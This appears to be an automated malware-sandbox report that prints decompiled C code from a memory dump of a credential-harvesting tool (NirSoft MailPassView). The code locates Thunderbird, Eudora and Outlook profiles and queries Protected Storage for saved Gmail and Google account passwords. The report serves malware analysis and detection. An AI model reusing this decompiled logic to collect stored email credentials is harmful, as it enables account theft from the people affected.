                                                                        • FindFirstFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406ED9
                                                                        • FindNextFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406EF7
                                                                        • strlen.MSVCRT ref: 00406F27
                                                                        • strlen.MSVCRT ref: 00406F2F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileFindstrlen$FirstNext
                                                                        • String ID: rA
                                                                        • API String ID: 379999529-474049127
                                                                        • Opcode ID: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                                        • Instruction ID: 479c8733b6b08075922562257f7174063dbd0ea9e1486761d8d5d3546bede414
                                                                        • Opcode Fuzzy Hash: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                                        • Instruction Fuzzy Hash: 00118272005205AFD714DB34E844ADBB3D9DF44324F21493FF55AD21D0EB38A9548758
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401E8B, Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E00401E8B(void* __eflags, char* _a4) {
				signed int _v8;
				int _v12;
				void _v275;
				char _v276;
				void _v539;
				char _v540;
				void _v795;
				char _v796;
				void _v1059;
				char _v1060;
				void _v1323;
				char _v1324;
				void _v2347;
				char _v2348;
				void* __edi;
				void* __esi;
				int _t65;
				char* _t69;
				char _t70;
				int _t71;
				char _t75;
				void* _t76;
				long _t78;
				void* _t83;
				int _t85;
				void* _t87;
				int _t104;
				int _t108;
				char _t126;
				void* _t137;
				void* _t139;
				char* _t157;
				char* _t158;
				char* _t160;
				int _t161;
				void* _t164;
				CHAR* _t169;
				char* _t170;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t175;

				_v540 = 0;
				memset( &_v539, 0, 0x104);
				_t164 = 0x1a;
				E0040EE59( &_v540, _t164); // executed
				_t65 = strlen("Mozilla\\Profiles");
				_t6 = strlen( &_v540) + 1; // 0x1
				_t172 = _t171 + 0x14;
				if(_t65 + _t6 >= 0x104) {
					_t69 = _a4;
					 *_t69 = 0;
					_t157 = _t69;
				} else {
					_t157 = _a4;
					E004062AD(_t157,  &_v540, "Mozilla\\Profiles");
				}
				_t70 = E0040614B(_t157);
				if(_t70 == 0) {
					 *_t157 = _t70;
				}
				_t158 = _t157 + 0x105;
				_t71 = strlen("Thunderbird\\Profiles");
				_t12 = strlen( &_v540) + 1; // 0x1
				if(_t71 + _t12 >= 0x104) {
					 *_t158 = 0;
				} else {
					E004062AD(_t158,  &_v540, "Thunderbird\\Profiles");
				}
				_t75 = E0040614B(_t158);
				_pop(_t137);
				if(_t75 == 0) {
					 *_t158 = _t75;
				}
				_t160 = _a4 + 0x20a;
				_t76 = E00401C97(_t137, _t160, 0x80000001, "Software\\Qualcomm\\Eudora\\CommandLine", "current"); // executed
				_t173 = _t172 + 0xc;
				if(_t76 == 0) {
					_t126 = E00401C97(_t137, _t160, 0x80000002, "Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", 0x412466); // executed
					_t173 = _t173 + 0xc;
					if(_t126 == 0) {
						 *_t160 = _t126;
					}
				}
				_v8 = _v8 & 0x00000000;
				_t78 = E0040EB3F(0x80000002, "Software\\Mozilla\\Mozilla Thunderbird",  &_v8);
				_t174 = _t173 + 0xc;
				if(_t78 != 0) {
					L32:
					_t169 = _a4 + 0x30f;
					if( *_t169 != 0) {
						L35:
						return _t78;
					}
					ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t169, 0x104);
					_t78 = E0040614B(_t169);
					if(_t78 != 0) {
						goto L35;
					}
					 *_t169 = _t78;
					return _t78;
				} else {
					_v796 = _t78;
					_t161 = 0;
					memset( &_v795, 0, 0xff);
					_v12 = 0;
					_t83 = E0040EC05(_v8, 0,  &_v796);
					_t175 = _t174 + 0x18;
					if(_t83 != 0) {
						L31:
						_t78 = RegCloseKey(_v8);
						goto L32;
					}
					_t170 = "sqlite3.dll";
					do {
						_t85 = atoi( &_v796);
						_pop(_t139);
						if(_t85 < 3) {
							goto L28;
						}
						_v2348 = 0;
						memset( &_v2347, _t161, 0x3ff);
						_v276 = 0;
						memset( &_v275, _t161, 0x104);
						sprintf( &_v2348, "%s\\Main",  &_v796);
						E0040EBC1(_t139, _v8,  &_v2348, "Install Directory",  &_v276, 0x104);
						_t175 = _t175 + 0x38;
						if(_v276 != 0 && E0040614B( &_v276) != 0) {
							_v1060 = 0;
							memset( &_v1059, _t161, 0x104);
							_v1324 = 0;
							memset( &_v1323, _t161, 0x104);
							_t104 = strlen(_t170);
							_t41 = strlen( &_v276) + 1; // 0x1
							_t175 = _t175 + 0x20;
							if(_t104 + _t41 >= 0x104) {
								_v1060 = 0;
							} else {
								E004062AD( &_v1060,  &_v276, _t170);
							}
							_t108 = strlen("nss3.dll");
							_t47 = strlen( &_v276) + 1; // 0x1
							if(_t108 + _t47 >= 0x104) {
								_v1324 = 0;
							} else {
								E004062AD( &_v1324,  &_v276, "nss3.dll");
							}
							if(E0040614B( &_v1060) == 0 || E0040614B( &_v1324) == 0) {
								_t161 = 0;
								goto L28;
							} else {
								strcpy(_a4 + 0x30f,  &_v276);
								goto L31;
							}
						}
						L28:
						_v12 = _v12 + 1;
						_t87 = E0040EC05(_v8, _v12,  &_v796);
						_t175 = _t175 + 0xc;
					} while (_t87 == 0);
					goto L31;
				}
			}














































                                                                        0x00401ea6
                                                                        0x00401ead
                                                                        0x00401eb4
                                                                        0x00401ebb
                                                                        0x00401ec6
                                                                        0x00401ed9
                                                                        0x00401edd
                                                                        0x00401ee2
                                                                        0x00401efa
                                                                        0x00401efd
                                                                        0x00401f00
                                                                        0x00401ee4
                                                                        0x00401ee4
                                                                        0x00401ef1
                                                                        0x00401ef7
                                                                        0x00401f03
                                                                        0x00401f0b
                                                                        0x00401f0d
                                                                        0x00401f0d
                                                                        0x00401f14
                                                                        0x00401f1a
                                                                        0x00401f2d
                                                                        0x00401f35
                                                                        0x00401f4e
                                                                        0x00401f37
                                                                        0x00401f45
                                                                        0x00401f4b
                                                                        0x00401f52
                                                                        0x00401f59
                                                                        0x00401f5a
                                                                        0x00401f5c
                                                                        0x00401f5c
                                                                        0x00401f6b
                                                                        0x00401f76
                                                                        0x00401f7b
                                                                        0x00401f85
                                                                        0x00401f92
                                                                        0x00401f97
                                                                        0x00401f9c
                                                                        0x00401f9e
                                                                        0x00401f9e
                                                                        0x00401f9c
                                                                        0x00401fa0
                                                                        0x00401fae
                                                                        0x00401fb3
                                                                        0x00401fb8
                                                                        0x004021a9
                                                                        0x004021ac
                                                                        0x004021b5
                                                                        0x004021d5
                                                                        0x004021d5
                                                                        0x004021d5
                                                                        0x004021be
                                                                        0x004021c5
                                                                        0x004021cd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004021cf
                                                                        0x00000000
                                                                        0x00401fbe
                                                                        0x00401fc3
                                                                        0x00401fc9
                                                                        0x00401fd3
                                                                        0x00401fe3
                                                                        0x00401fe6
                                                                        0x00401feb
                                                                        0x00401ff0
                                                                        0x004021a0
                                                                        0x004021a3
                                                                        0x00000000
                                                                        0x004021a3
                                                                        0x00401ff6
                                                                        0x00401ffb
                                                                        0x00402002
                                                                        0x0040200a
                                                                        0x0040200b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040201e
                                                                        0x00402025
                                                                        0x00402033
                                                                        0x0040203a
                                                                        0x00402052
                                                                        0x0040206e
                                                                        0x00402073
                                                                        0x0040207d
                                                                        0x004020a1
                                                                        0x004020a8
                                                                        0x004020b6
                                                                        0x004020bd
                                                                        0x004020c3
                                                                        0x004020d6
                                                                        0x004020da
                                                                        0x004020df
                                                                        0x004020f8
                                                                        0x004020e1
                                                                        0x004020ef
                                                                        0x004020f5
                                                                        0x00402104
                                                                        0x00402117
                                                                        0x0040211f
                                                                        0x0040213c
                                                                        0x00402121
                                                                        0x00402133
                                                                        0x00402139
                                                                        0x00402152
                                                                        0x00402165
                                                                        0x00000000
                                                                        0x00402189
                                                                        0x00402199
                                                                        0x00000000
                                                                        0x0040219f
                                                                        0x00402152
                                                                        0x00402167
                                                                        0x00402167
                                                                        0x00402177
                                                                        0x0040217c
                                                                        0x0040217f
                                                                        0x00000000
                                                                        0x00402187

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00401EAD
                                                                        • strlen.MSVCRT ref: 00401EC6
                                                                        • strlen.MSVCRT ref: 00401ED4
                                                                        • strlen.MSVCRT ref: 00401F1A
                                                                        • strlen.MSVCRT ref: 00401F28
                                                                        • memset.MSVCRT ref: 00401FD3
                                                                        • atoi.MSVCRT ref: 00402002
                                                                        • memset.MSVCRT ref: 00402025
                                                                        • sprintf.MSVCRT ref: 00402052
                                                                          • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                        • memset.MSVCRT ref: 004020A8
                                                                        • memset.MSVCRT ref: 004020BD
                                                                        • strlen.MSVCRT ref: 004020C3
                                                                        • strlen.MSVCRT ref: 004020D1
                                                                        • strlen.MSVCRT ref: 00402104
                                                                        • strlen.MSVCRT ref: 00402112
                                                                        • memset.MSVCRT ref: 0040203A
                                                                          • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                          • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                        • strcpy.MSVCRT(?,00000000), ref: 00402199
                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004021A3
                                                                        • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004021BE
                                                                          • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strlen$memset$Closestrcpy$AttributesEnvironmentExpandFileStringsatoisprintfstrcat
                                                                        • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                        • API String ID: 2492260235-4223776976
                                                                        • Opcode ID: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                                        • Instruction ID: fcae88f02dbfb35d0bd4b12665d2d891c1e7b320b053452542e36e55e3802549
                                                                        • Opcode Fuzzy Hash: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                                        • Instruction Fuzzy Hash: C891E472904158BADB21E765CC46FDA77AC9F44308F1004BBF609F2182EB789BD58B5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040B9AD, Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 168COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 85%
                                                                        			E0040B9AD(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a12) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v304;
				signed int _v308;
				struct HWND__* _v312;
				intOrPtr _v604;
				struct HACCEL__* _v620;
				struct HWND__* _v644;
				char _v900;
				char _v904;
				char _v908;
				struct tagMSG _v936;
				intOrPtr _v940;
				struct HWND__* _v944;
				struct HWND__* _v948;
				char _v956;
				char _v980;
				char _v988;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t49;
				void* _t52;
				int _t56;
				int _t58;
				int _t68;
				void* _t72;
				int _t75;
				int _t77;
				struct HWND__* _t78;
				int _t80;
				int _t85;
				int _t86;
				struct HWND__* _t100;

				 *0x416b94 = _a4; // executed
				_t49 = E00404837(__ecx); // executed
				if(_t49 != 0) {
					E0040EDAC();
					_t52 = E00406A2C( &_v980);
					_t100 = 0;
					_v940 = 0x20;
					_v948 = 0;
					_v936.hwnd = 0;
					_v944 = 0;
					_v936.message = 0;
					E0040B785(_t52,  &_v900);
					_v8 =  &_v980;
					E00406C87(__eflags,  &_v980, _a12);
					_t56 = E00406DFB(_v16, "/savelangfile");
					__eflags = _t56;
					if(_t56 < 0) {
						E0040823D(); // executed
						_t58 = E00406DFB(_v8, "/deleteregkey");
						__eflags = _t58;
						if(_t58 < 0) {
							 *0x417110 = 0x11223344; // executed
							EnumResourceTypesA( *0x416b94, E0040ED91, 0); // executed
							__eflags =  *0x417110 - 0x1c233487;
							if( *0x417110 == 0x1c233487) {
								__eflags =  *((intOrPtr*)(_v12 + 0x30)) - 1;
								if(__eflags <= 0) {
									L13:
									__imp__CoInitialize(_t100);
									E0040B70A( &_v908);
									__eflags = _v604 - 3;
									if(_v604 != 3) {
										_push(5);
									} else {
										_push(3);
									}
									ShowWindow(_v644, ??);
									UpdateWindow(_v644);
									_v620 = LoadAcceleratorsA( *0x416b94, 0x67);
									E0040AD9D( &_v908);
									_t68 = GetMessageA( &_v936, _t100, _t100, _t100);
									__eflags = _t68;
									if(_t68 == 0) {
										L24:
										__imp__CoUninitialize();
										goto L25;
									} else {
										do {
											_t75 = TranslateAcceleratorA(_v644, _v620,  &_v936);
											__eflags = _t75;
											if(_t75 != 0) {
												goto L23;
											}
											_t78 =  *0x4171ac;
											__eflags = _t78 - _t100;
											if(_t78 == _t100) {
												L21:
												_t80 = IsDialogMessageA(_v644,  &_v936);
												__eflags = _t80;
												if(_t80 == 0) {
													TranslateMessage( &_v936);
													DispatchMessageA( &_v936);
												}
												goto L23;
											}
											_t85 = IsDialogMessageA(_t78,  &_v936);
											__eflags = _t85;
											if(_t85 != 0) {
												goto L23;
											}
											goto L21;
											L23:
											_t77 = GetMessageA( &_v936, _t100, _t100, _t100);
											__eflags = _t77;
										} while (_t77 != 0);
										goto L24;
									}
								}
								_t86 = E0040B8D7( &_v904, __eflags);
								__eflags = _t86;
								if(_t86 == 0) {
									_t100 = 0;
									__eflags = 0;
									goto L13;
								}
								_push(_v28);
								_v904 = 0x41356c;
								L004115D6();
								__eflags = _v304;
								if(_v304 != 0) {
									DeleteObject(_v304);
									_v308 = _v308 & 0x00000000;
								}
								goto L27;
							}
							MessageBoxA(0, "Failed to load the executable file !", "Error", 0x30);
							goto L25;
						}
						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
						goto L25;
					} else {
						 *0x417488 = 0x416b28;
						E0040836E();
						L25:
						_push(_v32);
						_v908 = 0x41356c;
						L004115D6();
						__eflags = _v308 - _t100;
						if(_v308 != _t100) {
							DeleteObject(_v308);
							_v312 = _t100;
						}
						L27:
						_v908 = 0x412474;
						E00406A4E( &_v988);
						E0040462E( &_v956);
						E00406A4E( &_v988);
						_t72 = 0;
						__eflags = 0;
						goto L28;
					}
				} else {
					_t72 = _t49 + 1;
					L28:
					return _t72;
				}
			}








































                                                                        0x0040b9bf
                                                                        0x0040b9c4
                                                                        0x0040b9cb
                                                                        0x0040b9d3
                                                                        0x0040b9dc
                                                                        0x0040b9e1
                                                                        0x0040b9e7
                                                                        0x0040b9ef
                                                                        0x0040b9f3
                                                                        0x0040b9f7
                                                                        0x0040b9fb
                                                                        0x0040b9ff
                                                                        0x0040ba0c
                                                                        0x0040ba13
                                                                        0x0040ba24
                                                                        0x0040ba29
                                                                        0x0040ba2b
                                                                        0x0040ba41
                                                                        0x0040ba52
                                                                        0x0040ba57
                                                                        0x0040ba59
                                                                        0x0040ba7c
                                                                        0x0040ba86
                                                                        0x0040ba8c
                                                                        0x0040ba96
                                                                        0x0040bab7
                                                                        0x0040babb
                                                                        0x0040bb09
                                                                        0x0040bb0a
                                                                        0x0040bb14
                                                                        0x0040bb19
                                                                        0x0040bb21
                                                                        0x0040bb27
                                                                        0x0040bb23
                                                                        0x0040bb23
                                                                        0x0040bb23
                                                                        0x0040bb30
                                                                        0x0040bb3d
                                                                        0x0040bb51
                                                                        0x0040bb5c
                                                                        0x0040bb6f
                                                                        0x0040bb71
                                                                        0x0040bb73
                                                                        0x0040bbe3
                                                                        0x0040bbe3
                                                                        0x00000000
                                                                        0x0040bb75
                                                                        0x0040bb7b
                                                                        0x0040bb8e
                                                                        0x0040bb94
                                                                        0x0040bb96
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040bb98
                                                                        0x0040bb9d
                                                                        0x0040bb9f
                                                                        0x0040bbad
                                                                        0x0040bbb9
                                                                        0x0040bbbb
                                                                        0x0040bbbd
                                                                        0x0040bbc4
                                                                        0x0040bbcf
                                                                        0x0040bbcf
                                                                        0x00000000
                                                                        0x0040bbbd
                                                                        0x0040bba7
                                                                        0x0040bba9
                                                                        0x0040bbab
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040bbd5
                                                                        0x0040bbdd
                                                                        0x0040bbdf
                                                                        0x0040bbdf
                                                                        0x00000000
                                                                        0x0040bb7b
                                                                        0x0040bb73
                                                                        0x0040bac1
                                                                        0x0040bac6
                                                                        0x0040bac8
                                                                        0x0040bb07
                                                                        0x0040bb07
                                                                        0x00000000
                                                                        0x0040bb07
                                                                        0x0040baca
                                                                        0x0040bad1
                                                                        0x0040bad9
                                                                        0x0040bade
                                                                        0x0040bae7
                                                                        0x0040baf4
                                                                        0x0040bafa
                                                                        0x0040bafa
                                                                        0x00000000
                                                                        0x0040bae7
                                                                        0x0040baa5
                                                                        0x00000000
                                                                        0x0040baa5
                                                                        0x0040ba65
                                                                        0x00000000
                                                                        0x0040ba2d
                                                                        0x0040ba2d
                                                                        0x0040ba37
                                                                        0x0040bbe9
                                                                        0x0040bbe9
                                                                        0x0040bbf0
                                                                        0x0040bbf8
                                                                        0x0040bbfd
                                                                        0x0040bc05
                                                                        0x0040bc0e
                                                                        0x0040bc14
                                                                        0x0040bc14
                                                                        0x0040bc1b
                                                                        0x0040bc1f
                                                                        0x0040bc27
                                                                        0x0040bc30
                                                                        0x0040bc39
                                                                        0x0040bc3e
                                                                        0x0040bc3e
                                                                        0x00000000
                                                                        0x0040bc3e
                                                                        0x0040b9cd
                                                                        0x0040b9cd
                                                                        0x0040bc40
                                                                        0x0040bc46
                                                                        0x0040bc46

                                                                        APIs
                                                                          • Part of subcall function 00404837: LoadLibraryA.KERNEL32(comctl32.dll,73B74DE0,?,00000000,?,?,?,0040B9C9,73B74DE0), ref: 00404856
                                                                          • Part of subcall function 00404837: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                                          • Part of subcall function 00404837: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,73B74DE0), ref: 0040487C
                                                                          • Part of subcall function 00404837: MessageBoxA.USER32 ref: 004048A7
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040BBF8
                                                                        • DeleteObject.GDI32(?), ref: 0040BC0E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                        • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MailPassView
                                                                        • API String ID: 745651260-414181363
                                                                        • Opcode ID: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                                        • Instruction ID: 29be9d14b742f54cd69d53bb86675b71f99c80547e1740e7b57482248bd42427
                                                                        • Opcode Fuzzy Hash: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                                        • Instruction Fuzzy Hash: 9D518D71108345ABC7209F61DD09A9BBBF8FF84705F00483FF685A22A1DB789914CB5E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00403C3D, Relevance: 24.7, APIs: 3, Strings: 11, Instructions: 170librarystringloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 65%
                                                                        			E00403C3D(signed int __ecx, void* __eflags, void* __fp0) {
				char _v8;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t38;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t58;
				void* _t60;
				char* _t73;
				void* _t76;
				_Unknown_base(*)()* _t86;
				void* _t87;
				void* _t89;
				signed int _t98;
				char* _t106;
				_Unknown_base(*)()* _t120;
				void* _t131;

				_t131 = __fp0;
				_t91 = __ecx;
				_push(__ecx);
				_t98 = __ecx;
				_t89 = __ecx + 0x87c;
				 *(_t89 + 0xc) =  *(_t89 + 0xc) & 0x00000000;
				E0040E894(_t89);
				_t38 = LoadLibraryA("pstorec.dll"); // executed
				 *(_t89 + 8) = _t38;
				if(_t38 == 0) {
					L4:
					E0040E894(_t89);
				} else {
					_t86 = GetProcAddress(_t38, "PStoreCreateInstance");
					_t120 = _t86;
					_t91 = 0 | _t120 != 0x00000000;
					 *(_t89 + 0x10) = _t86;
					if(_t120 != 0) {
						goto L4;
					} else {
						_t91 = _t89 + 4;
						_t87 =  *_t86(_t89 + 4, 0, 0, 0);
						_t122 = _t87;
						if(_t87 != 0) {
							goto L4;
						} else {
							 *(_t89 + 0xc) = 1;
						}
					}
				}
				E004047A0(_t98 + 0x890, _t122);
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Gmail account");
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Gmail account");
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Google Account");
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Google Account");
				_push(_t98 + 0x858); // executed
				E0040754D(_t91, _t122); // executed
				E0040719C(_t91, _t98 + 0x86c); // executed
				E0040765B(_t122, _t98 + 0x878); // executed
				_t52 = E0040EB3F(0x80000001, "Software\\Microsoft\\Internet Account Manager\\Accounts",  &_v8);
				_t123 = _t52;
				if(_t52 == 0) {
					E00402BB8(_t91,  &_v8, _t123, _t131, _t98, 1);
				}
				_t54 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts",  &_v8);
				_t124 = _t54;
				if(_t54 == 0) {
					E00402BB8(_t91,  &_v8, _t124, _t131, _t98, 5);
				}
				E00402C44(_t91, _t131, _t98); // executed
				 *((intOrPtr*)(_t98 + 0xb1c)) = 6;
				_t56 = E00406278();
				_push( &_v8);
				if( *((intOrPtr*)(_t56 + 0x10)) != 1) {
					_push("Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles");
				} else {
					_push("Software\\Microsoft\\Windows Messaging Subsystem\\Profiles");
				}
				_push(0x80000001);
				_t58 = E0040EB3F();
				_t126 = _t58;
				if(_t58 != 0) {
					 *((char*)(_t98 + 0xa9c)) = 0;
				} else {
					E00402B09( &_v8, _t126, _t131, _t98);
				}
				 *((intOrPtr*)(_t98 + 0xb1c)) = 0xf;
				_t60 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles",  &_v8);
				_t127 = _t60;
				if(_t60 != 0) {
					 *((char*)(_t98 + 0xa9c)) = 0;
				} else {
					E00402B09( &_v8, _t127, _t131, _t98);
				}
				E0040E8AB(_t89);
				E004047F1(_t98 + 0x890);
				E00402FC2(_t98, _t91, _t131, 0x80000001); // executed
				E00402FC2(_t98, _t91, _t131, 0x80000002); // executed
				E0040329E(_t131, _t98);
				E004034CB(_t91, _t127, _t131, _t98); // executed
				E0040396C(_t127, _t131, _t98); // executed
				E004037B1(_t91, _t98, _t131, _t98); // executed
				_t73 = _t98 + 0xb20;
				_t128 =  *_t73;
				if( *_t73 != 0) {
					 *((intOrPtr*)(_t98 + 0xf34)) = 0xa;
					E0040D37A(_t98 + 0x1c8, _t128, _t73, 0);
				}
				_t106 = _t98 + 0xc25;
				_t129 =  *_t106;
				if( *_t106 != 0) {
					strcpy(_t98 + 0x52a, _t98 + 0xe2f);
					 *((intOrPtr*)(_t98 + 0xf34)) = 0xb;
					E0040D37A(_t98 + 0x1c8, _t129, _t106, 0);
				}
				_push(_t98 + 0x640); // executed
				E0040D9F9(_t129); // executed
				E0040D865(_t98 + 0x640);
				_t76 = E00410D1B(_t98 + 0x870, _t98 + 0x870); // executed
				return _t76;
			}





















                                                                        0x00403c3d
                                                                        0x00403c3d
                                                                        0x00403c40
                                                                        0x00403c44
                                                                        0x00403c46
                                                                        0x00403c4c
                                                                        0x00403c52
                                                                        0x00403c5c
                                                                        0x00403c66
                                                                        0x00403c69
                                                                        0x00403c9b
                                                                        0x00403c9d
                                                                        0x00403c6b
                                                                        0x00403c71
                                                                        0x00403c79
                                                                        0x00403c7b
                                                                        0x00403c7e
                                                                        0x00403c83
                                                                        0x00000000
                                                                        0x00403c85
                                                                        0x00403c88
                                                                        0x00403c8c
                                                                        0x00403c8e
                                                                        0x00403c90
                                                                        0x00000000
                                                                        0x00403c92
                                                                        0x00403c92
                                                                        0x00403c92
                                                                        0x00403c90
                                                                        0x00403c83
                                                                        0x00403ca8
                                                                        0x00403cb2
                                                                        0x00403cbc
                                                                        0x00403cc6
                                                                        0x00403cd0
                                                                        0x00403cdb
                                                                        0x00403cdc
                                                                        0x00403ce8
                                                                        0x00403cf4
                                                                        0x00403d07
                                                                        0x00403d0f
                                                                        0x00403d11
                                                                        0x00403d19
                                                                        0x00403d19
                                                                        0x00403d2c
                                                                        0x00403d34
                                                                        0x00403d36
                                                                        0x00403d3e
                                                                        0x00403d3e
                                                                        0x00403d44
                                                                        0x00403d49
                                                                        0x00403d53
                                                                        0x00403d5f
                                                                        0x00403d60
                                                                        0x00403d69
                                                                        0x00403d62
                                                                        0x00403d62
                                                                        0x00403d62
                                                                        0x00403d6e
                                                                        0x00403d73
                                                                        0x00403d7b
                                                                        0x00403d7d
                                                                        0x00403d8a
                                                                        0x00403d7f
                                                                        0x00403d83
                                                                        0x00403d83
                                                                        0x00403d9f
                                                                        0x00403da9
                                                                        0x00403db1
                                                                        0x00403db3
                                                                        0x00403dc0
                                                                        0x00403db5
                                                                        0x00403db9
                                                                        0x00403db9
                                                                        0x00403dc9
                                                                        0x00403dd4
                                                                        0x00403de0
                                                                        0x00403dec
                                                                        0x00403df2
                                                                        0x00403df8
                                                                        0x00403dfe
                                                                        0x00403e04
                                                                        0x00403e09
                                                                        0x00403e0f
                                                                        0x00403e12
                                                                        0x00403e1d
                                                                        0x00403e27
                                                                        0x00403e27
                                                                        0x00403e2c
                                                                        0x00403e32
                                                                        0x00403e35
                                                                        0x00403e45
                                                                        0x00403e55
                                                                        0x00403e5f
                                                                        0x00403e5f
                                                                        0x00403e6a
                                                                        0x00403e6b
                                                                        0x00403e71
                                                                        0x00403e7d
                                                                        0x00403e86

                                                                        APIs
                                                                          • Part of subcall function 0040E894: FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                                        • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C5C
                                                                        • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C71
                                                                        • strcpy.MSVCRT(?,?), ref: 00403E45
                                                                        Strings
                                                                        • pstorec.dll, xrefs: 00403C57
                                                                        • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CFD
                                                                        • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D62
                                                                        • www.google.com:443/Please log in to your Google Account, xrefs: 00403CCB
                                                                        • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D95
                                                                        • www.google.com/Please log in to your Gmail account, xrefs: 00403CAD
                                                                        • PStoreCreateInstance, xrefs: 00403C6B
                                                                        • www.google.com/Please log in to your Google Account, xrefs: 00403CC1
                                                                        • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403D22
                                                                        • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D69
                                                                        • www.google.com:443/Please log in to your Gmail account, xrefs: 00403CB7
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Library$AddressFreeLoadProcstrcpy
